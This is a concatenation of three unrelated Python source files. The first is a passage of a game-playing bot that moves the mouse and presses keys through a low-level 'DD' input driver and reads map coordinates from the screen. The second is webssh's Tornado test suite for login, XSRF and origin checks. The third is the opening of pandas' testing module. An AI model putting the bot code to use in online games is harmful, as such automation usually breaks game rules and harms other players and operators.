win32gui.SetForegroundWindow(self.game_hwnd)
cent_x = self.game_rect[0]+self.client_rect[2]/2
cent_y = self.game_rect[1]+self.client_rect[3]/2
DD.DD_mov(cent_x,cent_y)
map_size_info = self.mapsizeinfo[self.map_name]
time.sleep(1)
DD.DD_key_click(300)
time.sleep(0.1)
while self.minimap_location[0] ==-1:
print self.minimap_location
time.sleep(0.2)
x_diff = x-self.minimap_location[0]
y_diff = self.minimap_location[1]-y
map_size = (float(map_size_info[0]),float(map_size_info[1]))
min_map_size = (float(map_size_info[2]),float(map_size_info[3]))
mov_x = int(x_diff*(min_map_size[0]/map_size[0]))
mov_y = int(y_diff*(min_map_size[1]/map_size[1]))
move_to_x = cent_x+mov_x
move_to_y = cent_y+mov_y
DD.DD_mov(move_to_x,move_to_y)
DD.DD_btn_click(1)
time.sleep(0.5)
mouse_offset = 1
max_count = 100
while (abs(x-self.minimap_location[0])>1 or abs(y-self.minimap_location[1])>0) and max_count>1:
max_count = max_count-1
print self.minimap_location
x_diff = x-self.minimap_location[0]
y_diff = self.minimap_location[1]-y
if(x_diff>0): move_to_x=move_to_x+mouse_offset
elif(x_diff<0): move_to_x=move_to_x-mouse_offset
if(y_diff>0): move_to_y=move_to_y+mouse_offset
elif(y_diff<0): move_to_y=move_to_y-mouse_offset
DD.DD_mov(move_to_x,move_to_y)
time.sleep(0.5)
DD.DD_btn_click(1)
DD.DD_btn_click(1)
DD.DD_key_click(300)
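# Worked example of the map-to-minimap scaling used above (added for clarity;
# the numbers are made up): with a map width of 400 game units and a minimap
# width of 100 pixels, a target 120 units to the right of the hero gives
# x_diff = 120 and mov_x = int(120 * (100.0 / 400)) = 30 pixels of mouse
# travel from the minimap centre.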
def go_point_mini(self,x,y):
win32gui.SetForegroundWindow(self.game_hwnd)
cent_x = self.game_rect[0]+self.client_rect[2]/2
cent_y = self.game_rect[1]+self.client_rect[3]/2+8
DD.DD_mov(cent_x,cent_y)
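# NOTE: the bare 'return' on the next line exits here, so the minimap
# navigation code below it never runs (possibly a debugging leftover).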
return
map_size_info = self.mapsizeinfo[self.map_name]
time.sleep(1)
mouse_offset = 50
max_count = 50
while (abs(x-self.hero_location_info[0])>2 or abs(y-self.hero_location_info[1])>2) and max_count>0:
max_count = max_count-1
# determine where on screen the character currently appears
offset_x,offset_y = self.hero_offset(map_size_info)
x_diff = x-self.hero_location_info[0]
y_diff = self.hero_location_info[1]-y
if(x_diff>0): offset_x=offset_x+mouse_offset
elif(x_diff<0): offset_x=offset_x-mouse_offset
if(y_diff>0): offset_y=offset_y+mouse_offset
elif(y_diff<0): offset_y=offset_y-mouse_offset
DD.DD_mov(cent_x+offset_x,cent_y+offset_y)
DD.DD_btn_click(1)
DD.DD_btn_click(1)
time.sleep(0.3)
def hero_offset(self,map_size_info):
"""
获取角色相对画面中心的偏移
"""
offset_x = 0
offset_y = 0
if self.hero_location_info[0] >= self.client_rect[0]/2 and self.hero_location_info[0] <= (map_size_info[0]- self.client_rect[0]/2):
offset_x = 0
elif self.hero_location_info[0] < self.client_rect[0]/2:
offset_x = self.hero_location_info[0] - self.client_rect[0]/2
elif self.hero_location_info[0] > (map_size_info[0]- self.client_rect[0]/2):
offset_x = self.hero_location_info[0] - (map_size_info[0]- self.client_rect[0]/2)
if self.hero_location_info[1] >= self.client_rect[1]/2 and self.hero_location_info[1] <= (map_size_info[1]- self.client_rect[1]/2):
offset_y = 0
elif self.hero_location_info[1] < self.client_rect[1]/2:
offset_y = self.client_rect[1]/2 - self.hero_location_info[1]
elif self.hero_location_info[1] > (map_size_info[1]- self.client_rect[1]/2):
offset_y = (map_size_info[1]- self.client_rect[1]/2) - self.hero_location_info[1]
return (offset_x,offset_y)
def find_point(image):
mach_list = []
match_info = []
feature_names = read_feature_file("feature/coordinates/names.txt")
feature_numbers = read_feature_file("feature/coordinates/numbers.txt")
image_bin = img_gray_and_bin(image,200,255)
#cv2.imwrite("image_bin.png",image_bin)
# first locate the separator between the digits and the Chinese characters
img_left = cv2.imread("feature/coordinates/left.png")
img_left_bin = img_gray_and_bin(img_left,200,255)
find_list = comparehits_bin_min(image_bin,img_left_bin,255)
if len(find_list) < 1 : return match_info
left_x = find_list[0][0]
img_right = cv2.imread("feature/coordinates/right.png")
img_right_bin = img_gray_and_bin(img_right,200,255)
find_list = comparehits_bin_min(image_bin,img_right_bin,255)
if len(find_list) < 1 : return match_info
right_x = find_list[0][0]
#print "left:",left_x," right:",right_x
# match the map name
for i in xrange(len(feature_names)):
feature_img = cv2.imread("feature/coordinates/"+feature_names[i][0])
feature_img_bin = img_gray_and_bin(feature_img,200,255)
find_list = comparehits_bin_min(image_bin,feature_img_bin,2,0,left_x)
for m in find_list:
mach_list.append((m[0],feature_names[i][1]))
#print m[0],":",feature_names[i][1].decode('utf-8')," bc_min:",m[1]
mach_list.sort(cmp = lambda x ,y : cmp(x[0],y[0]))
for m in mach_list:
match_info.append(m[1])
# match the coordinates
mach_list =[]
for i in xrange(len(feature_numbers)):
feature_img = cv2.imread("feature/coordinates/"+feature_numbers[i][0])
feature_img_bin = img_gray_and_bin(feature_img,200,255)
find_list = comparehits_bin_min(image_bin,feature_img_bin,1,left_x,0)
for m in find_list:
mach_list.append((m[0],feature_numbers[i][1]))
#print m[0],":",feature_numbers[i][1].decode('utf-8')," bc_min:",m[1]
mach_list.sort(cmp = lambda x ,y : cmp(x[0],y[0]))
for m in mach_list:
match_info.append(m[1])
return match_info
def split_point(title_image):
#get_screen_sub_pilimage()
#pil_to_cv2
#title_image = get_screen_sub_pilimage(20, 20,110,18)
#title_image = Image.open('point.jpg')
cv_title_image = pil_to_cv2(title_image)
cv_title_image_bin = img_gray_and_bin(cv_title_image,200,255)
h, w = cv_title_image.shape[:2]
img_left = cv2.imread("feature/coordinates/left.png")
img_left_bin = img_gray_and_bin(img_left,200,255)
find_list = comparehits_bin_min(cv_title_image_bin,img_left_bin)
left_x = find_list[0][0]
img_right = cv2.imread("feature/coordinates/right.png")
img_right_bin = img_gray_and_bin(img_right,200,255)
find_list = comparehits_bin_min(cv_title_image_bin,img_right_bin)
right_x = find_list[0][0]
print "left:",left_x," right:",right_x
# crop Chinese characters: 11 pixels wide, height 12
endx = left_x - 1
while endx > 12:
bounds = (endx-11,0,endx,h)
sub_img = title_image.crop(bounds)
sub_img.save("point/"+str(endx)+".png")
print endx
endx = endx -11 -1
# crop digits: 5 pixels wide
endx = right_x - 1
while endx-left_x > 6:
bounds = (endx-5,0,endx,h)
sub_img = title_image.crop(bounds)
sub_img.save("point/s_"+str(endx)+".png")
print endx
endx = endx -5 -1
def get_coordinates(image):
mapname = u""
hero_location = [-1,-1]
img = get_image_sub(image,(20, 24,110,12))
#cv2.imwrite("img.png",img)
mach_list = find_point(img)
info = ""
for m in mach_list:
info+=m
hero_location_info = info.decode('utf-8')
try:
h = hero_location_info.split('[')
mapname = h[0]
h = h[1].split(']')
h = h[0].split(',')
hero_location[0] = int(h[0])
hero_location[1] = int(h[1])
except Exception,e:
pass
return (mapname,hero_location)
def get_minimap_location(image):
minimap_location = [-1,-1]
mach_list = []
match_info = []
feature_numbers = read_feature_file("feature/minimaplocation/numbers.txt")
image_bin = img_gray_and_bin(image,200,255)
#cv2.imwrite("image_bin.png",image_bin)
# match the coordinates
for i in xrange(len(feature_numbers)):
feature_img = cv2.imread("feature/minimaplocation/"+feature_numbers[i][0])
feature_img_bin = img_gray_and_bin(feature_img,200,255)
find_list = comparehits_bin_min_x(image_bin,feature_img_bin,0.1,move_px=1)
for m in find_list:
mach_list.append((m[0],feature_numbers[i][1]))
mach_list.sort(cmp = lambda x ,y : cmp(x[0],y[0]))
for m in mach_list:
match_info.append(m[1])
info = ""
for m in match_info:
info+=m
if len(info)>0:
try:
x = info.split(",")
minimap_location = [int(x[0]),int(x[-1])]
except Exception,e:
pass
return minimap_location
|
test_app.py
|
import json
import random
import threading
import tornado.websocket
import tornado.gen
from tornado.testing import AsyncHTTPTestCase
from tornado.httpclient import HTTPError
from tornado.options import options
from tests.sshserver import run_ssh_server, banner
from tests.utils import encode_multipart_formdata, read_file, make_tests_data_path # noqa
from webssh import handler
from webssh.main import make_app, make_handlers
from webssh.settings import (
get_app_settings, get_server_settings, max_body_size
)
from webssh.utils import to_str
from webssh.worker import clients
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
handler.DELAY = 0.1
swallow_http_errors = handler.swallow_http_errors
class TestAppBase(AsyncHTTPTestCase):
def get_httpserver_options(self):
return get_server_settings(options)
def assert_response(self, bstr, response):
if swallow_http_errors:
self.assertEqual(response.code, 200)
self.assertIn(bstr, response.body)
else:
self.assertEqual(response.code, 400)
self.assertIn(b'Bad Request', response.body)
def assert_status_in(self, data, status):
self.assertIsNone(data['encoding'])
self.assertIsNone(data['id'])
self.assertIn(status, data['status'])
def assert_status_equal(self, data, status):
self.assertIsNone(data['encoding'])
self.assertIsNone(data['id'])
self.assertEqual(status, data['status'])
def assert_status_none(self, data):
self.assertIsNotNone(data['encoding'])
self.assertIsNotNone(data['id'])
self.assertIsNone(data['status'])
def fetch_request(self, url, method='GET', body='', headers={}, sync=True):
if not sync and url.startswith('/'):
url = self.get_url(url)
if isinstance(body, dict):
body = urlencode(body)
if not headers:
headers = self.headers
else:
headers.update(self.headers)
client = self if sync else self.get_http_client()
return client.fetch(url, method=method, body=body, headers=headers)
def sync_post(self, url, body, headers={}):
return self.fetch_request(url, 'POST', body, headers)
def async_post(self, url, body, headers={}):
return self.fetch_request(url, 'POST', body, headers, sync=False)
class TestAppBasic(TestAppBase):
running = [True]
sshserver_port = 2200
body = 'hostname=127.0.0.1&port={}&_xsrf=yummy&username=robey&password=foo'.format(sshserver_port) # noqa
headers = {'Cookie': '_xsrf=yummy'}
def get_app(self):
self.body_dict = {
'hostname': '127.0.0.1',
'port': str(self.sshserver_port),
'username': 'robey',
'password': '',
'_xsrf': 'yummy'
}
loop = self.io_loop
options.debug = False
options.policy = random.choice(['warning', 'autoadd'])
options.hostfile = ''
options.syshostfile = ''
options.tdstream = ''
app = make_app(make_handlers(loop, options), get_app_settings(options))
return app
@classmethod
def setUpClass(cls):
print('='*20)
t = threading.Thread(
target=run_ssh_server, args=(cls.sshserver_port, cls.running)
)
t.setDaemon(True)
t.start()
@classmethod
def tearDownClass(cls):
cls.running.pop()
print('='*20)
def test_app_with_invalid_form_for_missing_argument(self):
response = self.fetch('/')
self.assertEqual(response.code, 200)
body = 'port=7000&username=admin&password&_xsrf=yummy'
response = self.sync_post('/', body)
self.assert_response(b'Missing argument hostname', response)
body = 'hostname=127.0.0.1&port=7000&password&_xsrf=yummy'
response = self.sync_post('/', body)
self.assert_response(b'Missing argument username', response)
body = 'hostname=&port=&username=&password&_xsrf=yummy'
response = self.sync_post('/', body)
self.assert_response(b'Missing value hostname', response)
body = 'hostname=127.0.0.1&port=7000&username=&password&_xsrf=yummy'
response = self.sync_post('/', body)
self.assert_response(b'Missing value username', response)
def test_app_with_invalid_form_for_invalid_value(self):
body = 'hostname=127.0.0&port=22&username=&password&_xsrf=yummy'
response = self.sync_post('/', body)
self.assert_response(b'Invalid hostname', response)
body = 'hostname=http://www.googe.com&port=22&username=&password&_xsrf=yummy' # noqa
response = self.sync_post('/', body)
self.assert_response(b'Invalid hostname', response)
body = 'hostname=127.0.0.1&port=port&username=&password&_xsrf=yummy'
response = self.sync_post('/', body)
self.assert_response(b'Invalid port', response)
body = 'hostname=127.0.0.1&port=70000&username=&password&_xsrf=yummy'
response = self.sync_post('/', body)
self.assert_response(b'Invalid port', response)
def test_app_with_wrong_hostname_ip(self):
body = 'hostname=127.0.0.2&port=2200&username=admin&_xsrf=yummy'
response = self.sync_post('/', body)
self.assertEqual(response.code, 200)
self.assertIn(b'Unable to connect to', response.body)
def test_app_with_wrong_hostname_domain(self):
body = 'hostname=xxxxxxxxxxxx&port=2200&username=admin&_xsrf=yummy'
response = self.sync_post('/', body)
self.assertEqual(response.code, 200)
self.assertIn(b'Unable to connect to', response.body)
def test_app_with_wrong_port(self):
body = 'hostname=127.0.0.1&port=7000&username=admin&_xsrf=yummy'
response = self.sync_post('/', body)
self.assertEqual(response.code, 200)
self.assertIn(b'Unable to connect to', response.body)
def test_app_with_wrong_credentials(self):
response = self.sync_post('/', self.body + 's')
self.assert_status_in(json.loads(to_str(response.body)), 'Authentication failed.') # noqa
def test_app_with_correct_credentials(self):
response = self.sync_post('/', self.body)
self.assert_status_none(json.loads(to_str(response.body)))
def test_app_with_correct_credentials_but_with_no_port(self):
default_port = handler.DEFAULT_PORT
handler.DEFAULT_PORT = self.sshserver_port
# with no port value
body = self.body.replace(str(self.sshserver_port), '')
response = self.sync_post('/', body)
self.assert_status_none(json.loads(to_str(response.body)))
# with no port argument
body = body.replace('port=&', '')
response = self.sync_post('/', body)
self.assert_status_none(json.loads(to_str(response.body)))
handler.DEFAULT_PORT = default_port
@tornado.testing.gen_test
def test_app_with_correct_credentials_timeout(self):
url = self.get_url('/')
response = yield self.async_post(url, self.body)
data = json.loads(to_str(response.body))
self.assert_status_none(data)
url = url.replace('http', 'ws')
ws_url = url + 'ws?id=' + data['id']
yield tornado.gen.sleep(handler.DELAY + 0.1)
ws = yield tornado.websocket.websocket_connect(ws_url)
msg = yield ws.read_message()
self.assertIsNone(msg)
self.assertEqual(ws.close_reason, 'Websocket authentication failed.')
@tornado.testing.gen_test
def test_app_with_correct_credentials_user_robey(self):
url = self.get_url('/')
response = yield self.async_post(url, self.body)
data = json.loads(to_str(response.body))
self.assert_status_none(data)
url = url.replace('http', 'ws')
ws_url = url + 'ws?id=' + data['id']
ws = yield tornado.websocket.websocket_connect(ws_url)
msg = yield ws.read_message()
self.assertEqual(to_str(msg, data['encoding']), banner)
ws.close()
@tornado.testing.gen_test
def test_app_with_correct_credentials_but_without_id_argument(self):
url = self.get_url('/')
response = yield self.async_post(url, self.body)
data = json.loads(to_str(response.body))
self.assert_status_none(data)
url = url.replace('http', 'ws')
ws_url = url + 'ws'
ws = yield tornado.websocket.websocket_connect(ws_url)
msg = yield ws.read_message()
self.assertIsNone(msg)
self.assertIn('Missing argument id', ws.close_reason)
@tornado.testing.gen_test
def test_app_with_correct_credentials_but_empty_id(self):
url = self.get_url('/')
response = yield self.async_post(url, self.body)
data = json.loads(to_str(response.body))
self.assert_status_none(data)
url = url.replace('http', 'ws')
ws_url = url + 'ws?id='
ws = yield tornado.websocket.websocket_connect(ws_url)
msg = yield ws.read_message()
self.assertIsNone(msg)
self.assertIn('Missing value id', ws.close_reason)
@tornado.testing.gen_test
def test_app_with_correct_credentials_but_wrong_id(self):
url = self.get_url('/')
response = yield self.async_post(url, self.body)
data = json.loads(to_str(response.body))
self.assert_status_none(data)
url = url.replace('http', 'ws')
ws_url = url + 'ws?id=1' + data['id']
ws = yield tornado.websocket.websocket_connect(ws_url)
msg = yield ws.read_message()
self.assertIsNone(msg)
self.assertIn('Websocket authentication failed', ws.close_reason)
@tornado.testing.gen_test
def test_app_with_correct_credentials_user_bar(self):
body = self.body.replace('robey', 'bar')
url = self.get_url('/')
response = yield self.async_post(url, body)
data = json.loads(to_str(response.body))
self.assert_status_none(data)
url = url.replace('http', 'ws')
ws_url = url + 'ws?id=' + data['id']
ws = yield tornado.websocket.websocket_connect(ws_url)
msg = yield ws.read_message()
self.assertEqual(to_str(msg, data['encoding']), banner)
# messages below will be ignored silently
yield ws.write_message('hello')
yield ws.write_message('"hello"')
yield ws.write_message('[hello]')
yield ws.write_message(json.dumps({'resize': []}))
yield ws.write_message(json.dumps({'resize': {}}))
yield ws.write_message(json.dumps({'resize': 'ab'}))
yield ws.write_message(json.dumps({'resize': ['a', 'b']}))
yield ws.write_message(json.dumps({'resize': {'a': 1, 'b': 2}}))
yield ws.write_message(json.dumps({'resize': [100]}))
yield ws.write_message(json.dumps({'resize': [100]*10}))
yield ws.write_message(json.dumps({'resize': [-1, -1]}))
yield ws.write_message(json.dumps({'data': [1]}))
yield ws.write_message(json.dumps({'data': (1,)}))
yield ws.write_message(json.dumps({'data': {'a': 2}}))
yield ws.write_message(json.dumps({'data': 1}))
yield ws.write_message(json.dumps({'data': 2.1}))
yield ws.write_message(json.dumps({'key-non-existed': 'hello'}))
# end - these are just for testing webssh websocket stability
yield ws.write_message(json.dumps({'resize': [79, 23]}))
msg = yield ws.read_message()
self.assertEqual(b'resized', msg)
yield ws.write_message(json.dumps({'data': 'bye'}))
msg = yield ws.read_message()
self.assertEqual(b'bye', msg)
ws.close()
@tornado.testing.gen_test
def test_app_auth_with_valid_pubkey_by_urlencoded_form(self):
url = self.get_url('/')
privatekey = read_file(make_tests_data_path('user_rsa_key'))
self.body_dict.update(privatekey=privatekey)
response = yield self.async_post(url, self.body_dict)
data = json.loads(to_str(response.body))
self.assert_status_none(data)
url = url.replace('http', 'ws')
ws_url = url + 'ws?id=' + data['id']
ws = yield tornado.websocket.websocket_connect(ws_url)
msg = yield ws.read_message()
self.assertEqual(to_str(msg, data['encoding']), banner)
ws.close()
@tornado.testing.gen_test
def test_app_auth_with_valid_pubkey_by_multipart_form(self):
url = self.get_url('/')
privatekey = read_file(make_tests_data_path('user_rsa_key'))
files = [('privatekey', 'user_rsa_key', privatekey)]
content_type, body = encode_multipart_formdata(self.body_dict.items(),
files)
headers = {
'Content-Type': content_type, 'content-length': str(len(body))
}
response = yield self.async_post(url, body, headers=headers)
data = json.loads(to_str(response.body))
self.assert_status_none(data)
url = url.replace('http', 'ws')
ws_url = url + 'ws?id=' + data['id']
ws = yield tornado.websocket.websocket_connect(ws_url)
msg = yield ws.read_message()
self.assertEqual(to_str(msg, data['encoding']), banner)
ws.close()
@tornado.testing.gen_test
def test_app_auth_with_invalid_pubkey_for_user_robey(self):
url = self.get_url('/')
privatekey = 'h' * 1024
files = [('privatekey', 'user_rsa_key', privatekey)]
content_type, body = encode_multipart_formdata(self.body_dict.items(),
files)
headers = {
'Content-Type': content_type, 'content-length': str(len(body))
}
if swallow_http_errors:
response = yield self.async_post(url, body, headers=headers)
self.assertIn(b'Invalid private key', response.body)
else:
with self.assertRaises(HTTPError) as ctx:
yield self.async_post(url, body, headers=headers)
self.assertIn('Bad Request', ctx.exception.message)
@tornado.testing.gen_test
def test_app_auth_with_pubkey_exceeds_key_max_size(self):
url = self.get_url('/')
privatekey = 'h' * (handler.KEY_MAX_SIZE * 2)
files = [('privatekey', 'user_rsa_key', privatekey)]
content_type, body = encode_multipart_formdata(self.body_dict.items(),
files)
headers = {
'Content-Type': content_type, 'content-length': str(len(body))
}
if swallow_http_errors:
response = yield self.async_post(url, body, headers=headers)
self.assertIn(b'Invalid private key', response.body)
else:
with self.assertRaises(HTTPError) as ctx:
yield self.async_post(url, body, headers=headers)
self.assertIn('Bad Request', ctx.exception.message)
@tornado.testing.gen_test
def test_app_auth_with_pubkey_cannot_be_decoded_by_multipart_form(self):
url = self.get_url('/')
privatekey = 'h' * 1024
files = [('privatekey', 'user_rsa_key', privatekey)]
content_type, body = encode_multipart_formdata(self.body_dict.items(),
files)
body = body.encode('utf-8')
# append some GBK-encoded bytes to the private key so it cannot be decoded as UTF-8
body = body[:-100] + b'\xb4\xed\xce\xf3' + body[-100:]
headers = {
'Content-Type': content_type, 'content-length': str(len(body))
}
if swallow_http_errors:
response = yield self.async_post(url, body, headers=headers)
self.assertIn(b'Invalid unicode', response.body)
else:
with self.assertRaises(HTTPError) as ctx:
yield self.async_post(url, body, headers=headers)
self.assertIn('Bad Request', ctx.exception.message)
def test_app_post_form_with_large_body_size_by_multipart_form(self):
privatekey = 'h' * (2 * max_body_size)
files = [('privatekey', 'user_rsa_key', privatekey)]
content_type, body = encode_multipart_formdata(self.body_dict.items(),
files)
headers = {
'Content-Type': content_type, 'content-length': str(len(body))
}
response = self.sync_post('/', body, headers=headers)
self.assertIn(response.code, [400, 599])
def test_app_post_form_with_large_body_size_by_urlencoded_form(self):
privatekey = 'h' * (2 * max_body_size)
body = self.body + '&privatekey=' + privatekey
response = self.sync_post('/', body)
self.assertIn(response.code, [400, 599])
@tornado.testing.gen_test
def test_app_with_user_keyonly_for_bad_authentication_type(self):
self.body_dict.update(username='keyonly', password='foo')
response = yield self.async_post('/', self.body_dict)
self.assertEqual(response.code, 200)
self.assert_status_in(json.loads(to_str(response.body)), 'Bad authentication type') # noqa
class OtherTestBase(TestAppBase):
sshserver_port = 3300
headers = {'Cookie': '_xsrf=yummy'}
debug = False
policy = None
xsrf = True
hostfile = ''
syshostfile = ''
tdstream = ''
maxconn = 20
origin = 'same'
body = {
'hostname': '127.0.0.1',
'port': '',
'username': 'robey',
'password': 'foo',
'_xsrf': 'yummy'
}
def get_app(self):
self.body.update(port=str(self.sshserver_port))
loop = self.io_loop
options.debug = self.debug
options.xsrf = self.xsrf
options.policy = self.policy if self.policy else random.choice(['warning', 'autoadd']) # noqa
options.hostfile = self.hostfile
options.syshostfile = self.syshostfile
options.tdstream = self.tdstream
options.maxconn = self.maxconn
options.origin = self.origin
app = make_app(make_handlers(loop, options), get_app_settings(options))
return app
def setUp(self):
print('='*20)
self.running = True
OtherTestBase.sshserver_port += 1
t = threading.Thread(
target=run_ssh_server, args=(self.sshserver_port, self.running)
)
t.setDaemon(True)
t.start()
super(OtherTestBase, self).setUp()
def tearDown(self):
self.running = False
print('='*20)
super(OtherTestBase, self).tearDown()
class TestAppInDebugMode(OtherTestBase):
debug = True
def assert_response(self, bstr, response):
if swallow_http_errors:
self.assertEqual(response.code, 200)
self.assertIn(bstr, response.body)
else:
self.assertEqual(response.code, 500)
self.assertIn(b'Uncaught exception', response.body)
def test_server_error_for_post_method(self):
body = dict(self.body, error='raise')
response = self.sync_post('/', body)
self.assert_response(b'"status": "Internal Server Error"', response)
def test_html(self):
response = self.fetch('/', method='GET')
self.assertIn(b'novalidate>', response.body)
class TestAppWithLargeBuffer(OtherTestBase):
@tornado.testing.gen_test
def test_app_for_sending_message_with_large_size(self):
url = self.get_url('/')
response = yield self.async_post(url, dict(self.body, username='foo'))
data = json.loads(to_str(response.body))
self.assert_status_none(data)
url = url.replace('http', 'ws')
ws_url = url + 'ws?id=' + data['id']
ws = yield tornado.websocket.websocket_connect(ws_url)
msg = yield ws.read_message()
self.assertEqual(to_str(msg, data['encoding']), banner)
send = 'h' * (64 * 1024) + '\r\n\r\n'
yield ws.write_message(json.dumps({'data': send}))
lst = []
while True:
msg = yield ws.read_message()
lst.append(msg)
if msg.endswith(b'\r\n\r\n'):
break
recv = b''.join(lst).decode(data['encoding'])
self.assertEqual(send, recv)
ws.close()
class TestAppWithRejectPolicy(OtherTestBase):
policy = 'reject'
hostfile = make_tests_data_path('known_hosts_example')
@tornado.testing.gen_test
def test_app_with_hostname_not_in_hostkeys(self):
response = yield self.async_post('/', self.body)
data = json.loads(to_str(response.body))
message = 'Connection to {}:{} is not allowed.'.format(self.body['hostname'], self.sshserver_port) # noqa
self.assertEqual(message, data['status'])
class TestAppWithBadHostKey(OtherTestBase):
policy = random.choice(['warning', 'autoadd', 'reject'])
hostfile = make_tests_data_path('test_known_hosts')
def setUp(self):
self.sshserver_port = 2222
super(TestAppWithBadHostKey, self).setUp()
@tornado.testing.gen_test
def test_app_with_bad_host_key(self):
response = yield self.async_post('/', self.body)
data = json.loads(to_str(response.body))
self.assertEqual('Bad host key.', data['status'])
class TestAppWithTrustedStream(OtherTestBase):
tdstream = '127.0.0.2'
def test_with_forbidden_get_request(self):
response = self.fetch('/', method='GET')
self.assertEqual(response.code, 403)
self.assertIn('Forbidden', response.error.message)
def test_with_forbidden_post_request(self):
response = self.sync_post('/', self.body)
self.assertEqual(response.code, 403)
self.assertIn('Forbidden', response.error.message)
def test_with_forbidden_put_request(self):
response = self.fetch_request('/', method='PUT', body=self.body)
self.assertEqual(response.code, 403)
self.assertIn('Forbidden', response.error.message)
class TestAppNotFoundHandler(OtherTestBase):
custom_headers = handler.MixinHandler.custom_headers
def test_with_not_found_get_request(self):
response = self.fetch('/pathnotfound', method='GET')
self.assertEqual(response.code, 404)
self.assertEqual(
response.headers['Server'], self.custom_headers['Server']
)
self.assertIn(b'404: Not Found', response.body)
def test_with_not_found_post_request(self):
response = self.sync_post('/pathnotfound', self.body)
self.assertEqual(response.code, 404)
self.assertEqual(
response.headers['Server'], self.custom_headers['Server']
)
self.assertIn(b'404: Not Found', response.body)
def test_with_not_found_put_request(self):
response = self.fetch_request('/pathnotfound', method='PUT',
body=self.body)
self.assertEqual(response.code, 404)
self.assertEqual(
response.headers['Server'], self.custom_headers['Server']
)
self.assertIn(b'404: Not Found', response.body)
class TestAppWithHeadRequest(OtherTestBase):
def test_with_index_path(self):
response = self.fetch('/', method='HEAD')
self.assertEqual(response.code, 200)
def test_with_ws_path(self):
response = self.fetch('/ws', method='HEAD')
self.assertEqual(response.code, 405)
def test_with_not_found_path(self):
response = self.fetch('/notfound', method='HEAD')
self.assertEqual(response.code, 404)
class TestAppWithPutRequest(OtherTestBase):
xsrf = False
@tornado.testing.gen_test
def test_app_with_method_not_supported(self):
with self.assertRaises(HTTPError) as ctx:
yield self.fetch_request('/', 'PUT', self.body, sync=False)
self.assertIn('Method Not Allowed', ctx.exception.message)
class TestAppWithTooManyConnections(OtherTestBase):
maxconn = 1
def setUp(self):
clients.clear()
super(TestAppWithTooManyConnections, self).setUp()
@tornado.testing.gen_test
def test_app_with_too_many_connections(self):
clients['127.0.0.1'] = {'fake_worker_id': None}
url = self.get_url('/')
response = yield self.async_post(url, self.body)
data = json.loads(to_str(response.body))
self.assertEqual('Too many live connections.', data['status'])
clients['127.0.0.1'].clear()
response = yield self.async_post(url, self.body)
self.assert_status_none(json.loads(to_str(response.body)))
class TestAppWithCrossOriginOperation(OtherTestBase):
origin = 'http://www.example.com'
@tornado.testing.gen_test
def test_app_with_wrong_event_origin(self):
body = dict(self.body, _origin='localhost')
response = yield self.async_post('/', body)
self.assert_status_equal(json.loads(to_str(response.body)), 'Cross origin operation is not allowed.') # noqa
@tornado.testing.gen_test
def test_app_with_wrong_header_origin(self):
headers = dict(Origin='localhost')
response = yield self.async_post('/', self.body, headers=headers)
self.assert_status_equal(json.loads(to_str(response.body)), 'Cross origin operation is not allowed.') # noqa
@tornado.testing.gen_test
def test_app_with_correct_event_origin(self):
body = dict(self.body, _origin=self.origin)
response = yield self.async_post('/', body)
self.assert_status_none(json.loads(to_str(response.body)))
self.assertIsNone(response.headers.get('Access-Control-Allow-Origin'))
@tornado.testing.gen_test
def test_app_with_correct_header_origin(self):
headers = dict(Origin=self.origin)
response = yield self.async_post('/', self.body, headers=headers)
self.assert_status_none(json.loads(to_str(response.body)))
self.assertEqual(
response.headers.get('Access-Control-Allow-Origin'), self.origin
)
|
__init__.py
|
from __future__ import annotations
import collections
from datetime import datetime
from decimal import Decimal
from functools import wraps
import operator
import os
import re
import string
from typing import (
TYPE_CHECKING,
Callable,
ContextManager,
Counter,
Iterable,
)
import warnings
import numpy as np
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
from pandas._typing import Dtype
from pandas.core.dtypes.common import (
is_datetime64_dtype,
is_datetime64tz_dtype,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
)
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas._testing._io import ( # noqa:F401
close,
network,
round_trip_localpath,
round_trip_pathlib,
round_trip_pickle,
with_connectivity_check,
write_to_compressed,
)
from pandas._testing._random import ( # noqa:F401
randbool,
rands,
rands_array,
randu_array,
)
from pandas._testing._warnings import assert_produces_warning # noqa:F401
from pandas._testing.asserters import ( # noqa:F401
assert_almost_equal,
assert_attr_equal,
assert_categorical_equal,
assert_class_equal,
assert_contains_all,
assert_copy,
assert_datetime_array_equal,
assert_dict_equal,
assert_equal,
assert_extension_array_equal,
assert_frame_equal,
assert_index_equal,
assert_interval_array_equal,
assert_is_sorted,
assert_is_valid_plot_return_object,
assert_numpy_array_equal,
assert_period_array_equal,
assert_series_equal,
assert_sp_array_equal,
assert_timedelta_array_equal,
raise_assert_detail,
)
from pandas._testing.compat import get_dtype # noqa:F401
from pandas._testing.contexts import ( # noqa:F401
RNGContext,
decompress_file,
ensure_clean,
ensure_clean_dir,
ensure_safe_environment_variables,
set_timezone,
use_numexpr,
with_csv_dialect,
)
from pandas.core.arrays import (
DatetimeArray,
PandasArray,
PeriodArray,
TimedeltaArray,
period_array,
)
if TYPE_CHECKING:
from pandas import (
PeriodIndex,
TimedeltaIndex,
)
_N = 30
_K = 4
UNSIGNED_INT_DTYPES: list[Dtype] = ["uint8", "uint16", "uint32", "uint64"]
UNSIGNED_EA_INT_DTYPES: list[Dtype] = ["UInt8", "UInt16", "UInt32", "UInt64"]
SIGNED_INT_DTYPES: list[Dtype] = [int, "int8", "int16", "int32", "int64"]
SIGNED_EA_INT_DTYPES: list[Dtype] = ["Int8", "Int16", "Int32", "Int64"]
ALL_INT_DTYPES = UNSIGNED_INT_DTYPES + SIGNED_INT_DTYPES
ALL_EA_INT_DTYPES = UNSIGNED_EA_INT_DTYPES + SIGNED_EA_INT_DTYPES
FLOAT_DTYPES: list[Dtype] = [float, "float32", "float64"]
FLOAT_EA_DTYPES: list[Dtype] = ["Float32", "Float64"]
COMPLEX_DTYPES: list[Dtype] = [complex, "complex64", "complex128"]
STRING_DTYPES: list[Dtype] = [str, "str", "U"]
DATETIME64_DTYPES: list[Dtype] = ["datetime64[ns]", "M8[ns]"]
TIMEDELTA64_DTYPES: list[Dtype] = ["timedelta64[ns]", "m8[ns]"]
BOOL_DTYPES: list[Dtype] = [bool, "bool"]
BYTES_DTYPES: list[Dtype] = [bytes, "bytes"]
